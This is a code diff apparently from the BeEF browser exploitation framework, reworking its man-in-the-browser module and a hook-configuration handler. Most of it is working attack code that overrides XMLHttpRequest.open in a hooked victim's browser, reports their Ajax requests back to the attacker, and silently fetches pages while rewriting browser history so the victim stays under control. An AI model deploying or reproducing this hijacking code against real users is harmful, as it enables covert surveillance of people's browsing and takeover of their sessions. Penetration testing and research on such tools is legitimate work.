diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index 05b104af0..9ed626b74 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -15,46 +15,30 @@ beef.mitb = { beef.mitb.curl = curl; /*Override open method to intercept ajax request*/ var xml_type; + var hook_file = "<%= @hook_file %>"; if (window.XMLHttpRequest && !(window.ActiveXObject)) { - xml_type = 'XMLHttpRequest'; - } - - if (xml_type == "XMLHttpRequest") { beef.mitb.sniff("Method XMLHttpRequest.open override"); (function (open) { - XMLHttpRequest.prototype.open = function (method, url, async, user, pass) { - - var portRegex = new RegExp(":[0-9]+"); - var portR = portRegex.exec(url); - /*return :port*/ - var requestPort; - - if (portR != null) { - requestPort = portR[0].split(":"); - } - - if ((user == "beef") && (pass == "beef")) { - /*a poisoned something*/ - open.call(this, method, url, async, null, null); - } - - - else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) { - /*a beef hook.js polling or dh */ - open.call(this, method, url, async, null, null); - } - - else { + XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) { + // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler) + // or a request initiated by the MiTB itself. + if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) { + open.call(this, method, url, async, true); + }else { + var portRegex = new RegExp(":[0-9]+"); + var portR = portRegex.exec(url); + var requestPort; + if (portR != null) { requestPort = portR[0].split(":")[1]; } + //GET request if (method == "GET") { + //GET request -> cross-domain if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) { beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url); window.open(url); - - } - else { + }else { //GET request -> same-domain beef.mitb.sniff("GET [Ajax Request]: " + url); if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) { var title = ""; @@ -63,26 +47,19 @@ beef.mitb = { } else { title = document.getElementsByTagName("title")[0].innerHTML; } - /*write the url of the page*/ + // write the url of the page history.pushState({ Be:"EF" }, title, url); - } - } - - } - else { - /*if we are here we have an ajax post req*/ - beef.mitb.sniff("Post ajax request to: " + url); - open.call(this, method, url, async, user, pass); - + }else{ + //POST request + beef.mitb.sniff("POST ajax request to: " + url); + open.call(this, method, url, async, true); } } }; })(XMLHttpRequest.prototype.open); - } - }, // Initializes the hook on anchors and forms. @@ -161,7 +138,7 @@ beef.mitb = { fetchForm:function (url, query, target) { try { var y = new XMLHttpRequest(); - y.open('POST', url, false, "beef", "beef"); + y.open('POST', url, false, true); y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); y.onreadystatechange = function () { if (y.readyState == 4 && y.responseText != "") { @@ -181,7 +158,7 @@ beef.mitb = { fetch:function (url, target) { try { var y = new XMLHttpRequest(); - y.open('GET', url, false, "beef", "beef"); + y.open('GET', url, false, true); y.onreadystatechange = function () { if (y.readyState == 4 && y.responseText != "") { @@ -204,7 +181,7 @@ beef.mitb = { try { var target = document.getElementsByTagName("html")[0]; var y = new XMLHttpRequest(); - y.open('GET', url, false, "beef", "beef"); + y.open('GET', url, false, true); y.onreadystatechange = function () { if (y.readyState == 4 && y.responseText != "") { var title = ""; diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 12ce8304e..e0338d660 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -74,6 +74,9 @@ module BeEF # @note set the XHR-polling timeout hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") + # @note set the hook file path + hook_session_config['hook_file'] = config.get("beef.http.hook_file") + # @note if http_port <> public_port in config ini, use the public_port unless hook_session_config['beef_public_port'].nil? if hook_session_config['beef_port'] != hook_session_config['beef_public_port']